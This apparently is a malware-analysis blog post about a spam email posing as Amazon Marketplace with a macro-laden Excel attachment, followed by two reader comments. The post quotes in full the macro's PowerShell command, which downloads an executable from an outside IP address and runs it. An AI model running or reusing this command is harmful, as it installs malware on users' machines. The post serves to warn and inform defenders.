This email with no body text comes with a malicious Excel attachment:
From: Amazon Marketplace [delivery@amazon.uk]
Date: 13 February 2015 at 14:34
Subject: RE: Remittance [Report ID:34355-6014742]
I have seen just a single sample of this with an attachment
D87278F02E.XLS which has a
zero detection rate at VirusTotal. This Excel spreadsheet contains this
malicious Excel macro [pastebin] which attempts to execute the following command:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.217/aksjdderwd/asdbwk/dhoei.exe','%TEMP%\oUhjidsf.exe');Start-Process '%TEMP%\oUhjidsf.exe';
The downloaded file
dhoei.exe is exactly the same as used in
this spam run.
2 comments:
Hi
Due to some reasons I was inattentively and have opened the excel attachment in the mail. Fortunately "oUhjidsf.exe" downloaded by the embeded macro failed to execute due to OS version incompatibilities:-)
see the Windows Logs Message below:
The program or feature "\??\C:\Users\abcdefg\AppData\Local\Temp\oUhjidsf.exe" cannot start or run due to incompatibity with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available.
How do I get rid of this?
Post a Comment